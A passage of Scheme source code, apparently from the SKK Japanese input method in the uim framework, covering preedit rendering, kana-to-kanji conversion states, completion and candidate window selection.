(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc)
(skk-make-string (skk-context-okuri sc)
skk-type-hiragana)
skk-use-numeric-conversion?)))
(if res
(begin
(skk-context-set-nth! sc 0)
(skk-context-set-nr-candidates! sc 0)
(skk-check-candidate-window-begin sc)
(if (skk-context-candidate-window sc)
(im-select-candidate sc 0))
(skk-context-set-state! sc 'skk-state-converting))
(if skk-use-recursive-learning?
(skk-setup-child-context sc skk-child-type-editor)
(skk-flush sc))))))
(define skk-begin-completion
(lambda (sc)
;; get residual 'n'
(if (eq? (skk-context-state sc) 'skk-state-kanji)
(skk-append-residual-kana sc))
(skk-lib-get-completion
skk-dic
(skk-make-string (skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)
(skk-context-set-completion-nth! sc 0)
(skk-context-set-state! sc 'skk-state-completion)))
(define skk-dcomp-word-tail
(lambda (sc)
(let ((h (skk-make-string (skk-context-head sc) skk-type-hiragana))
(w (skk-context-dcomp-word sc)))
(skk-lib-substring w (string-length h) (string-length w)))))
(define skk-do-update-preedit
(lambda (sc)
(let ((rkc (skk-context-rk-context sc))
(stat (skk-context-state sc))
(csc (skk-context-child-context sc))
(with-dcomp-word? #f))
;; mark
(if (and
(null? csc)
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-completion)
(eq? stat 'skk-state-okuri)))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "▽"))
(if (and
(null? csc)
(eq? stat 'skk-state-kcode))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "JIS "))
(if (or
(not (null? csc))
(eq? stat 'skk-state-converting))
(im-pushback-preedit sc skk-preedit-attr-mode-mark "▼"))
;; head without child context
(if (and
(null? csc)
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-okuri)
(eq? stat 'skk-state-kcode)))
(let ((h (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(if (string? h)
(im-pushback-preedit
sc skk-preedit-attr-head
h))))
;; dcomp
(if (and
skk-dcomp-activate?
(null? csc)
(eq? stat 'skk-state-kanji)
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(begin
(if skk-show-cursor-on-preedit?
(im-pushback-preedit sc preedit-cursor ""))
(im-pushback-preedit
sc skk-preedit-attr-dcomp
(skk-dcomp-word-tail sc))
(set! with-dcomp-word? #t)
))
;; conv-body + okuri
(if (and
(eq? stat 'skk-state-converting)
(or
(null? csc)
(and
(not (null? csc))
(= (skk-context-child-type sc) skk-child-type-dialog))))
(begin
(if (or
(eq? skk-candidate-selection-style 'uim)
(and
(eq? skk-candidate-selection-style 'ddskk-like)
(not (skk-context-candidate-window sc))))
(im-pushback-preedit
sc
(bitwise-ior skk-preedit-attr-conv-body
(if skk-show-cursor-on-preedit?
preedit-cursor
preedit-none))
(if skk-show-annotation-in-preedit?
(skk-lib-eval-candidate (skk-get-current-candidate sc))
(skk-lib-eval-candidate
(skk-lib-remove-annotation
(skk-get-current-candidate sc)))))
(im-pushback-preedit
sc
(bitwise-ior skk-preedit-attr-conv-body
(if skk-show-cursor-on-preedit?
preedit-cursor
preedit-none))
""))
(im-pushback-preedit
sc skk-preedit-attr-conv-okuri
(skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(im-pushback-preedit
sc skk-preedit-attr-conv-appendix
(skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))))
;; head with child context
(if (and
(not (null? csc))
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-okuri)
(and
(eq? stat 'skk-state-converting)
(eq? (skk-context-child-type sc) skk-child-type-editor))))
(let ((h '()))
(if skk-use-numeric-conversion?
;; replace numeric string with #
(set! h (skk-lib-replace-numeric
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(set! h (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(if (string? h)
(im-pushback-preedit
sc skk-preedit-attr-head
h))))
;; completion
(if (and
(eq? stat 'skk-state-completion)
(null? csc))
(let ((comp (skk-get-current-completion sc)))
(im-pushback-preedit
sc skk-preedit-attr-head
(if (not (string=? comp ""))
comp
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))))
;; okuri mark
(if (or
(eq? stat 'skk-state-okuri)
(and
(not (null? csc))
(eq? stat 'skk-state-converting)
(not (null? (skk-context-okuri sc)))
(= (skk-context-child-type sc) skk-child-type-editor)))
(begin
(im-pushback-preedit
sc skk-preedit-attr-okuri
(string-append
"*" (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc))))))
;; pending rk
(if (or
(eq? stat 'skk-state-direct)
(eq? stat 'skk-state-latin)
(eq? stat 'skk-state-wide-latin))
(begin
(im-pushback-preedit sc skk-preedit-attr-direct-pending-rk
(rk-pending rkc))
(if skk-show-cursor-on-preedit?
(im-pushback-preedit sc preedit-cursor "")))
(begin
(im-pushback-preedit sc skk-preedit-attr-pending-rk
(rk-pending rkc))
(if (and
(or
(eq? stat 'skk-state-kanji)
(eq? stat 'skk-state-completion)
(eq? stat 'skk-state-okuri)
(eq? stat 'skk-state-kcode))
skk-show-cursor-on-preedit?
(not with-dcomp-word?))
(im-pushback-preedit sc preedit-cursor ""))))
;; child context's preedit
(if (not (null? csc))
(let ((editor (skk-context-editor sc))
(dialog (skk-context-dialog sc)))
(if (= (skk-context-child-type sc) skk-child-type-editor)
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-beginning-mark
skk-child-context-beginning-mark)
(im-pushback-preedit sc
skk-preedit-attr-child-committed
(skk-editor-get-left-string editor)))
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
skk-child-context-beginning-mark)
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
(skk-dialog-get-left-string dialog))))
(skk-do-update-preedit csc)
(if (= (skk-context-child-type sc) skk-child-type-editor)
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-committed
(skk-editor-get-right-string editor))
(im-pushback-preedit sc
skk-preedit-attr-child-end-mark
skk-child-context-end-mark))
(begin
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
(skk-dialog-get-right-string dialog))
(im-pushback-preedit sc
skk-preedit-attr-child-dialog
skk-child-context-end-mark)))))
)))
(define skk-update-preedit
(lambda (sc)
(if (not (skk-context-commit-raw sc))
(begin
(im-clear-preedit sc)
(skk-do-update-preedit (skk-find-root-context sc))
(im-update-preedit sc))
(skk-context-set-commit-raw! sc #f))))
;; called from skk-editor
(define skk-commit-editor-context
(lambda (sc str)
(let* ((psc (skk-context-parent-context sc))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(str (if (not (null? psc))
str
(string-append str okuri appendix))))
(skk-flush sc)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(skk-commit sc str))))
(define skk-commit-dialog-context
(lambda (sc str)
(let* ((psc (skk-context-parent-context sc))
(okuri (skk-make-string (skk-context-okuri sc)
(skk-context-kana-mode sc)))
(appendix (skk-make-string (skk-context-appendix sc)
(skk-context-kana-mode sc)))
(str (if (not (null? psc))
str
(string-append str okuri appendix))))
(skk-flush sc)
(skk-context-set-child-context! sc '())
(skk-context-set-child-type! sc '())
(skk-commit sc str))))
;; experimental coding style. discussions are welcome -- YamaKen
(define skk-proc-state-direct-no-preedit
(lambda (key key-state sc rkc)
(if skk-use-with-vi?
(if (skk-vi-escape-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-latin)
(rk-flush rkc))))
(cond
((or (skk-cancel-key? key key-state)
(skk-backspace-key? key key-state)
(skk-return-key? key key-state))
(skk-commit-raw sc key key-state)
#f)
((skk-wide-latin-key? key key-state)
(skk-context-set-state! sc 'skk-state-wide-latin)
(rk-flush rkc)
#f)
((skk-latin-key? key key-state)
(skk-context-set-state! sc 'skk-state-latin)
(rk-flush rkc)
#f)
((skk-kcode-input-key? key key-state)
(skk-context-set-state! sc 'skk-state-kcode)
(rk-flush rkc)
#f)
((skk-latin-conv-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #t)
#f)
((skk-sticky-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
((skk-kanji-mode-key? key key-state)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
((skk-hankaku-kana-key? key key-state)
(let* ((kana (skk-context-kana-mode sc))
(new-kana (if (= kana skk-type-hankana)
skk-type-hiragana
skk-type-hankana)))
(skk-context-set-kana-mode! sc new-kana))
#f)
((skk-kana-toggle-key? key key-state)
(skk-context-kana-toggle sc)
#f)
;; bad strategy. see bug #528
((symbol? key)
(skk-commit-raw sc key key-state)
#f)
;; bad strategy. see bug #528
((or
(and
(shift-key-mask key-state)
(not (ichar-graphic? key)))
(control-key-mask key-state)
(alt-key-mask key-state)
(meta-key-mask key-state)
(super-key-mask key-state)
(hyper-key-mask key-state))
(if (not (skk-state-direct-no-preedit-nop-key? key key-state))
(skk-commit-raw sc key key-state))
#f)
(else
#t))))
(define skk-rk-pending?
(lambda (sc)
(if (null? (rk-context-seq (skk-context-rk-context sc)))
#f
#t)))
(define skk-proc-state-direct
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(key-str (charcode->string (skk-ichar-downcase key)))
(rkc (skk-context-rk-context sc))
(res #f)
(kana (skk-context-kana-mode sc)))
(and
;; at first, no preedit mode
(if (not (skk-rk-pending? sc))
(skk-proc-state-direct-no-preedit key key-state sc rkc)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(rk-backspace rkc)
#f)
#t)
;; commits "n" as kana according to kana-mode. This is
;; ddskk-compatible behavior.
(if (skk-commit-key? key key-state)
(begin
(set! res (rk-push-key-last! rkc))
#f)
#t)
;; commits "n" as kana according to kana-mode, and send
;; native return
(if (skk-return-key? key key-state)
(begin
(set! res (rk-push-key-last! rkc))
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
;; Handles "n{L,l,/,\,Q,C-q,C-Q,q}" key sequence as below. This is
;; ddskk-compatible behavior.
;; 1. commits "n" as kana according to kana-mode
;; 2. switch mode by "{L,l,/,\,Q,C-q,C-Q,q}"
(if (and (skk-wide-latin-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-wide-latin)
#f)
#t)
(if (and (skk-latin-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-latin)
#f)
#t)
(if (and (skk-kcode-input-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-set-state! sc 'skk-state-kcode)
#f)
#t)
(if (and (skk-latin-conv-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #t)
#f)
#t)
(if (and (skk-sticky-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
#t)
(if (and (skk-kanji-mode-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((residual-kana (rk-push-key-last! rkc)))
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)
#f)
#t)
(if (and (skk-hankaku-kana-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(let* ((kana (skk-context-kana-mode sc))
(new-kana (if (= kana skk-type-hankana)
skk-type-hiragana
skk-type-hankana)))
(set! res (rk-push-key-last! rkc))
(skk-context-set-kana-mode! sc new-kana)
#f)
#t)
(if (and (skk-kana-toggle-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-context-kana-toggle sc)
#f)
#t)
;; Handles "n " key sequence as below. This is ddskk-compatible
;; behavior.
;; 1. commits "n" as kana according to kana-mode
;; 2. commits " " as native space (such as Qt::Key_Space)
;; unless expected rkc list includes " "
(if (and (skk-plain-space-key? key key-state)
(not (rk-expect-key? rkc key-str)))
(begin
(set! res (rk-push-key-last! rkc))
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
;; bad strategy. see bug #528
;; "<Control>a", "<Alt> ", "<Meta>b" and so on
(if (or
(and
(shift-key-mask key-state)
(not (ichar-graphic? key)))
(control-key-mask key-state)
(alt-key-mask key-state)
(meta-key-mask key-state)
(super-key-mask key-state)
(hyper-key-mask key-state))
(begin
(skk-flush sc)
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
(if (skk-ichar-upper-case? key)
(if (and
(skk-rk-pending? sc)
(not (rk-current-seq rkc)))
;; ddskk compatible behavior but not in SKK speciation
(let ((str (rk-push-key! rkc (charcode->string
(skk-ichar-downcase key)))))
(skk-context-set-state! sc 'skk-state-kanji)
(if str
(skk-append-string sc str))
#f)
(let* ((residual-kana (rk-push-key-last! rkc)))
;; handle preceding "n"
(if residual-kana
(skk-commit sc (skk-get-string sc residual-kana kana)))
(skk-context-set-state! sc 'skk-state-kanji)
(set! key (skk-ichar-downcase key))
#t))
#t)
;; bad strategy. see bug #528
(if (symbol? key)
(begin
(skk-flush sc)
(skk-commit-raw-with-preedit-update sc key key-state)
#f)
#t)
(begin
(set! res
(rk-push-key!
rkc
key-str))
#t));;and
;; update state
(if (eq? (skk-context-state sc) 'skk-state-kanji)
(begin
(if res
(skk-append-string sc res))))
(if (or
(eq? (skk-context-state sc) 'skk-state-direct)
(eq? (skk-context-state sc) 'skk-state-latin)
(eq? (skk-context-state sc) 'skk-state-wide-latin)
(eq? (skk-context-state sc) 'skk-state-kcode))
(if (and res
(or
(list? (car res))
(not (string=? (car res) ""))))
(skk-get-string sc res kana)
#f)
#f))))
(define skk-sokuon-shiin-char?
(lambda (c)
(and (ichar-alphabetic? c)
(and
(not (= c 97)) ;; a
(not (= c 105)) ;; i
(not (= c 117)) ;; u
(not (= c 101)) ;; e
(not (= c 111)) ;; o
(not (= c 110)))))) ;; n
(define skk-rk-push-key-match-without-new-seq
(lambda (rkc key)
(let* ((s (rk-context-seq rkc))
(s (cons key s))
(rule (rk-context-rule rkc))
(seq (rk-lib-find-seq (reverse s) rule)))
(if (and
seq
(null? (cdar seq)))
(cadr seq)
#f))))
; see [Anthy-dev: 2646, 2654]
(define skk-commit-with-conv-completion
(lambda (sc)
(cond
((and skk-dcomp-activate?
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(if (skk-lib-get-entry
skk-dic
(skk-context-dcomp-word sc) "" "" skk-use-numeric-conversion?)
(begin
(skk-string-list-to-context-head
sc
(string-to-list (skk-context-dcomp-word sc)))
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-context-dcomp-word sc))
(skk-flush sc))))
((and skk-dcomp-activate?
(skk-rk-pending? sc)
(not (string=? (skk-context-dcomp-word sc) "")))
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(let ((dcomp (skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)))
(if (not (string=? dcomp ""))
(begin
(skk-string-list-to-context-head
sc
(string-to-list dcomp))
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc dcomp)
(skk-flush sc))))
(begin
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc))))))))
(else
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(if (skk-lib-get-entry
skk-dic
(skk-make-string
(skk-context-head sc) skk-type-hiragana)
""
""
skk-use-numeric-conversion?)
(begin
(skk-context-set-nth! sc 0)
(skk-commit sc (skk-prepare-commit-string sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc))))
(skk-flush sc))))))
(define skk-proc-state-kanji
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(rkc (skk-context-rk-context sc))
(stat (skk-context-state sc))
(res #f))
(and
;; First, check begin-conv, completion, cancel, backspace,
;; commit, and return keys
(if (skk-begin-conv-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))
#f)
#t)
(if (skk-begin-completion-key? key key-state)
(begin
(skk-begin-completion sc)
#f)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(if (not (rk-backspace rkc))
(if (> (length (skk-context-head sc)) 0)
(skk-context-set-head! sc (cdr (skk-context-head sc)))
(skk-flush sc)))
;;; dcomp
(if (and
skk-dcomp-activate?
(eq? (skk-context-state sc) 'skk-state-kanji))
(skk-context-set-dcomp-word!
sc
(if (not (skk-rk-pending? sc))
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?)
"")))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(skk-append-residual-kana sc)
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(if (not skk-egg-like-newline?)
(if (skk-return-key? key key-state)
(if skk-commit-newline-explicitly?
(skk-commit sc "\n")
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state)))))
#f)
#t)
(if (skk-begin-conv-with-completion-key? key key-state)
; do uim's own way --ekato. see [Anthy-dev: 2646, 2654]
(begin
(cond
((and skk-dcomp-activate?
(not (skk-rk-pending? sc))
(not (string=? (skk-context-dcomp-word sc) "")))
(let ((sl (string-to-list (skk-context-dcomp-word sc))))
(skk-string-list-to-context-head sc sl)
(skk-begin-conversion sc)))
((and skk-dcomp-activate?
(skk-rk-pending? sc)
(not (string=? (skk-context-dcomp-word sc) "")))
(skk-append-residual-kana sc)
(let ((sl (string-to-list
(skk-lib-get-dcomp-word
skk-dic
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))
skk-use-numeric-conversion?
skk-use-look?))))
(if (not (null? sl))
(begin
(skk-string-list-to-context-head sc sl)
(skk-begin-conversion sc))
(begin
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))))))
(else
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(skk-begin-conversion sc)
(skk-flush sc))))
#f)
#t)
(if (skk-commit-with-conv-completion-key? key key-state)
(begin
(skk-commit-with-conv-completion sc)
#f)
#t)
;; Then check latin-conv status before key handling of hiragana/katakana
(if (skk-context-latin-conv sc)
(begin
(cond
((skk-conv-wide-latin-key? key key-state)
;; wide latin conversion
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-conv-wide-latin
(skk-context-head sc)))
(skk-flush sc))))
((skk-conv-opposite-case-key? key key-state)
;; alternative case conversion
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-conv-opposite-case
(skk-context-head sc)))
(skk-flush sc))))
(else
;; append latin string
(begin
(if (ichar-graphic? key)
(let* ((s (charcode->string key))
(p (cons s (cons s (cons s s)))))
(skk-append-string sc p))))))
#f)
#t)
(if (skk-kanji-mode-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-latin-conv! sc #f)))
#f)
#t)
;; handle Settou-ji
(if (skk-special-midashi-key? key key-state)
(begin
(skk-append-residual-kana sc)
(skk-append-string sc '(">" ">" ">"))
(skk-begin-conversion sc)
#f)
#t)
(if (skk-sticky-key? key key-state)
(if (null? (skk-context-head sc))
(begin
(skk-commit sc (charcode->string key))
(skk-flush sc)
#f)
(begin
(skk-context-set-state! sc 'skk-state-okuri)
#f))
#t)
(if (and (skk-ichar-upper-case? key)
(not (null? (skk-context-head sc))))
(let ((key-str (charcode->string (skk-ichar-downcase key))))
(set! res (skk-rk-push-key-match-without-new-seq rkc key-str))
(if (and
(skk-rk-pending? sc)
(not (rk-current-seq rkc))
res)
;; ddskk compatible behavior but not in SKK speciation
(begin
(skk-context-set-state! sc 'skk-state-okuri)
(skk-context-set-okuri-head-using-alist!
sc
(car (reverse (rk-context-seq rkc))))
(rk-context-set-seq! rkc '())
(skk-append-okuri-string sc res)
(skk-begin-conversion sc)
#f)
(begin
(skk-context-set-state! sc 'skk-state-okuri)
(set! key (skk-ichar-downcase key))
(skk-context-set-okuri-head-using-alist! sc key-str)
(if (and (not (member key skk-set-henkan-point-key)) (skk-sokuon-shiin-char? key))
(begin
(set! res (rk-push-key! rkc key-str))
(if res
(skk-context-set-head! sc
(cons
res
(skk-context-head sc))))))
(skk-append-residual-kana sc)
#t)))
#t)
(if (skk-kana-toggle-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-opposite-kana
(skk-context-kana-mode sc))))
(skk-flush sc)))
#f)
#t)
(if (skk-hankaku-kana-key? key key-state)
(begin
(skk-append-residual-kana sc)
(if (not (null? (skk-context-head sc)))
(begin
(skk-commit sc (skk-make-string (skk-context-head sc)
skk-type-hankana))
(skk-flush sc)))
#f)
#t)
(begin
(set! key (skk-ichar-downcase key))
(set! stat (skk-context-state sc))
(set! res
(rk-push-key!
rkc
(charcode->string key)))
(and
(if (and
res
skk-auto-start-henkan?
(string-find skk-auto-start-henkan-keyword-list (car res))
(not (null? (skk-context-head sc))))
(begin
(skk-context-set-appendix! sc (list res))
(skk-begin-conversion sc)
#f)
#t)
(if (and res
(eq? stat 'skk-state-kanji)
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-string sc res)
#t)
#t)
(if (and res
(eq? stat 'skk-state-okuri)
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-okuri-string sc res)
(skk-begin-conversion sc))))))
#f)))
(define skk-setup-child-context
(lambda (sc type)
(let ((csc (skk-context-new (skk-context-uc sc)
(skk-context-im sc)))
(input-rule (skk-context-input-rule sc)))
(skk-context-set-child-context! sc csc)
(skk-context-set-child-type! sc type)
(skk-context-set-parent-context! csc sc)
(if (= type skk-child-type-editor)
(skk-context-set-state! csc 'skk-state-direct)
(skk-context-set-state! csc 'skk-state-latin))
(skk-set-rule! csc input-rule))))
(define skk-check-candidate-window-begin
(lambda (sc)
(if (and
(not (skk-context-candidate-window sc))
skk-use-candidate-window?
(> (skk-context-nth sc) (- skk-candidate-op-count 2)))
(begin
(skk-context-set-candidate-window! sc #t)
(skk-context-set-nr-candidates!
sc
(skk-lib-get-nr-candidates
skk-dic
(skk-make-string (skk-context-head sc) skk-type-hiragana)
(skk-context-okuri-head sc)
(skk-make-string (skk-context-okuri sc) skk-type-hiragana)
skk-use-numeric-conversion?))
(im-activate-candidate-selector
sc
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-nr-candidates sc))
((eq? skk-candidate-selection-style 'ddskk-like)
(- (skk-context-nr-candidates sc)
(- skk-candidate-op-count 1))))
skk-nr-candidate-max)))))
(define skk-commit-by-label-key
(lambda (sc key)
(let ((nr (skk-context-nr-candidates sc))
(cur-page (if (= skk-nr-candidate-max 0)
0
(cond
((eq? skk-candidate-selection-style 'uim)
(quotient (skk-context-nth sc)
skk-nr-candidate-max))
((eq? skk-candidate-selection-style 'ddskk-like)
(quotient (- (skk-context-nth sc)
(- skk-candidate-op-count 1))
skk-nr-candidate-max)))))
(idx -1)
(res #f))
(cond
((eq? skk-candidate-selection-style 'uim)
(let ((num (- (length skk-uim-heading-label-char-list)
(length
(member (charcode->string key)
skk-uim-heading-label-char-list)))))
(if (or (< num skk-nr-candidate-max)
(= skk-nr-candidate-max 0))
(set! idx (+ (* cur-page skk-nr-candidate-max) num)))))
((eq? skk-candidate-selection-style 'ddskk-like)
(let ((num (- (length skk-ddskk-like-heading-label-char-list)
(length
(member (charcode->string key)
skk-ddskk-like-heading-label-char-list)))))
(if (or (< num skk-nr-candidate-max)
(= skk-nr-candidate-max 0))
(set! idx (+ (* cur-page skk-nr-candidate-max)
num (- skk-candidate-op-count 1)))))))
(if (and (>= idx 0)
(< idx nr))
(begin
(skk-context-set-nth! sc idx)
(set! res (skk-prepare-commit-string sc))))
res)))
(define skk-incr-candidate-index
(lambda (sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-set-nth! sc (+ 1 (skk-context-nth sc))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> (+ (skk-context-nth sc) 1) (- skk-candidate-op-count 1))
(if (> (+ (skk-context-nth sc) skk-nr-candidate-max)
(- (skk-context-nr-candidates sc) 1))
;; go into recursive learning state
(skk-context-set-nth! sc (skk-context-nr-candidates sc))
;; just shift to next page
(im-shift-page-candidate sc #t))
;; just increment index unless candidate window exist
(skk-context-set-nth! sc (+ 1 (skk-context-nth sc))))))
(skk-context-set-candidate-op-count!
sc
(+ 1 (skk-context-candidate-op-count sc)))
#t))
(define skk-decr-candidate-index
(lambda (sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (> (skk-context-nth sc) 0)
(begin
(skk-context-set-nth! sc (- (skk-context-nth sc) 1))
#t)
(begin
(if (= (skk-context-nr-candidates sc) 0)
(begin
(skk-back-to-kanji-state sc)
#f)
(begin
(skk-context-set-nth!
sc
(- (skk-context-nr-candidates sc) 1))
#t)))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> (skk-context-nth sc)
(+ skk-nr-candidate-max (- skk-candidate-op-count 2)))
(begin
(im-shift-page-candidate sc #f)
#t)
(if (= (skk-context-nth sc) 0)
(begin
(skk-back-to-kanji-state sc)
#f)
(begin
(if (> (skk-context-nth sc) (- skk-candidate-op-count 2))
(begin
(skk-reset-candidate-window sc)
(skk-context-set-nth! sc
(- skk-candidate-op-count 1))))
(skk-context-set-nth! sc (- (skk-context-nth sc) 1))
#t)))))))
(define skk-change-candidate-index
(lambda (sc incr)
(let ((head (skk-context-head sc)))
(and
(if incr
(skk-incr-candidate-index sc)
(skk-decr-candidate-index sc))
(if (null? (skk-get-current-candidate sc))
(begin
(skk-context-set-nth! sc 0)
(if skk-use-recursive-learning?
(begin
(skk-reset-candidate-window sc)
(skk-setup-child-context sc skk-child-type-editor)))
#t)
#t)
(if (null? (skk-context-child-context sc))
(begin
;; 候補Windowの表示を開始するか
(skk-check-candidate-window-begin sc)
;;
(if (skk-context-candidate-window sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(im-select-candidate sc (skk-context-nth sc)))
((eq? skk-candidate-selection-style 'ddskk-like)
(im-select-candidate
sc
(- (skk-context-nth sc) (- skk-candidate-op-count 1))))))
#t)
#t))
#f)))
(define skk-reset-candidate-window
(lambda (sc)
(if (skk-context-candidate-window sc)
(begin
(im-deactivate-candidate-selector sc)
(skk-context-set-candidate-window! sc #f)))
(skk-context-set-candidate-op-count! sc 0)))
(define skk-back-to-kanji-state
(lambda (sc)
(skk-reset-candidate-window sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-okuri-head! sc "")
(if (not (null? (skk-context-okuri sc)))
(begin
(skk-context-set-head! sc
(append (skk-context-okuri sc)
(skk-context-head sc)))
(skk-reset-dcomp-word sc)))
(if (not (null? (skk-context-appendix sc)))
(begin
(skk-context-set-head! sc
(append (skk-context-appendix sc)
(skk-context-head sc)))
(skk-reset-dcomp-word sc)))
(skk-context-set-okuri! sc '())
(skk-context-set-appendix! sc '())
;; don't clear dcomp (not compatible with ddskk's behavior)
;;(skk-reset-dcomp-word sc )
(skk-context-set-nr-candidates! sc 0)))
(define skk-back-to-converting-state
(lambda (sc)
(skk-context-set-nth! sc (- (skk-context-nr-candidates sc) 1))
(skk-check-candidate-window-begin sc)
(if (skk-context-candidate-window sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(im-select-candidate sc (skk-context-nth sc)))
((eq? skk-candidate-selection-style 'ddskk-like)
(im-select-candidate
sc
(- (skk-context-nth sc) (- skk-candidate-op-count 1))))))
(skk-context-set-state! sc 'skk-state-converting)))
(define skk-change-completion-index
(lambda (sc incr)
(if incr
(begin
(if (> (- (skk-lib-get-nr-completions
skk-dic
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?
skk-use-look?)
1)
(skk-context-completion-nth sc))
(skk-context-set-completion-nth!
sc
(+ 1 (skk-context-completion-nth sc)))))
(begin
(if (> (skk-context-completion-nth sc) 0)
(skk-context-set-completion-nth!
sc
